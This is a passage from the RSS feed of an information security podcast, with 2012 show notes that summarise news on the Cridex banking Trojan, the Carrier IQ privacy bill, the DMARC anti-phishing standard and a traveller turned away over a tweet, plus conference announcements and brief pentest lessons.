<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://searchsecurity.techtarget.com/news/2240114619/Cridex-Trojan-breaks-CAPTCHA-targets-Facebook-Twitter-users"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://searchsecurity.techtarget.com/news/2240114619/Cridex-Trojan-breaks-CAPTCHA-targets-Facebook-Twitter-users</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A variant of a banking Trojan known as Cridex can communicate with a CAPTCHA-breaking server in order to establish malicious email accounts. Researchers at Websense Security Labs posted a video documenting how Cridex broke a CAPTCHA test and opened a Yahoo email account in six attempts.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Cridex network grows as it infects new machines via malicious emails. The emails contain links to a Black Hole exploit kit, which attacks vulnerabilities in Web browsers and plug-ins. If successful, the kit downloads Cridex onto the machine.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Cridex is a data-stealing Trojan that is similar to Zeus in the way it operates: It logs content from Web sessions and alters them to harvest information from the infected user,&rdquo; according to the Websense Security Labs blog.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cridex targets information from platforms like Facebook, Twitter and several online banking services. That data is then sent to a remote server.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://arstechnica.com/tech-policy/news/2012/01/mobile-device-privacy-act-would-prevent-secret-smartphone-monitoring.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/tech-policy/news/2012/01/mobile-device-privacy-act-would-prevent-secret-smartphone-monitoring.ars</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recent controversy sparked by the installation of monitoring software on millions of smartphones has led US Rep. Edward Markey (D-MA) to propose a requirement that carriers and phone makers inform consumers about the presence of monitoring software and gain their &quot;express consent&quot; before collecting and transmitting information from phones.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The controversy started a couple months back when a developer publicized the widespread use of Carrier IQ software, which phone manufacturers and carriers use to monitor what happens on a smartphone. While Apple, Samsung, HTC, AT&amp;T and others all said the software is used only as a diagnostics tool to improve network and service performance, congressmen started denouncing the use of Carrier IQ, and class-action lawsuits were filed. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-583-pentest-lessons-dnt-for-google-7-step-program-captcha-cracking-malware-mobile-device-privacy-act/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3447/0/infosec-daily-podcast-episode-583.mp3" length="18855746" type="audio/mpeg" />
		<itunes:duration>0:39:14</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 583 for February 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 583 for February 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Pentest Lessons:
	Adam Compton &#38; Zac Wagle&#39;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account: https://twitter.com/pentestlessons.
	Lesson 1: When having a pentest performed, the customer should not disregard all alerts. While unlikely, an unrelated attack may still be happening. &#160;When alerts occur during a pentest, the customer should always validate them against the pentester&#39;s IP addresses.
	Lesson 2: When using an exploit during a pentest, only use trusted and tested exploits. Do NOT assume that the exploit you just downloaded is safe.
	Lesson 3: When performing physical pentesting (sneaking in, by passing security, picking locks, etc&#8230;) ALWAYS have a good GET OUT OF JAIL FREE CARD!
	&#160;
Stories
Source: http://howto.cnet.com/8301-11310_39-57368016-285/how-to-prevent-google-f[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 582 &#8211; DMARC, DHSBS, USB Fixers, Skyipot, &amp; Chinese Hack Lawyers</title>
		<link>http://www.isdpodcast.com/episode-582-dmarc-dhsbs-usb-fixers-skyipot-chinese-hack-lawyers</link>
		<comments>http://www.isdpodcast.com/episode-582-dmarc-dhsbs-usb-fixers-skyipot-chinese-hack-lawyers#comments</comments>
		<pubDate>Wed, 01 Feb 2012 01:53:27 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3435</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 582 for January 31, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 582 for January 31, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Themson Mester and Dr. Bonez.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.cnet.com/8301-27080_3-57367842-245/antiphishing-standard-in-the-works-from-google-facebook-others/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-27080_3-57367842-245/antiphishing-standard-in-the-works-from-google-facebook-others/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google, Facebook, Microsoft, Yahoo, PayPal and others are working together on a standard that can be used across the Internet for blocking phishing e-mails.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 15 companies will be announcing on Monday DMARC.org, which stands for Domain-based Message Authentication, Reporting, and Conformance&#8211;a system for verifying that e-mails are coming from legitimate companies and not imposters trying to trick people into clicking a phishing link. Basically, the system offers a common way for companies to authenticate their legitimate communications with customers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Also in the DMARC working group are AOL, Bank of America, Fidelity Investments, American Greetings, LinkedIn, and e-mail security providers Agari, Cloudmark, eCert, Return Path, and Trusted Domain Project.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tgdaily.com/software-brief/61138-man-denied-entry-to-us-because-of-a-tweet"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tgdaily.com/software-brief/61138-man-denied-entry-to-us-because-of-a-tweet</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently the Department of Homeland Security has nothing better to do than to monitor what vacationing tourists post on Twitter.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A 26-year-old bar manager by the name of Leigh Van Bryan, an Irish citizen, decided to take a trip to Los Angeles. Before he left, he wrote this message on Twitter:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Free this week, for quick gossip/prep before I go and destroy America.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Then, to his surprise, when he arrived at LAX he was treated like a criminal, interrogated by government officials, and then forced to return back to his home.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">News reports compared the Twitter message to passengers who joke about having a bomb at the airport and are then escorted off the premises. But obviously, Bryan&#39;s message was not even a joke about violent activity.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone with a normal sense of the English language would realize the context implied he was going to &quot;tear it up&quot; or go wild, you know, have a good time. For anyone to even think that was any sort of potential threat is ridiculous.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In another tweet, Bryan apparently wrote that while in LA he would be &quot;diggin&#39; Marilyn Monroe up,&quot; a reference to an episode of Family Guy.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
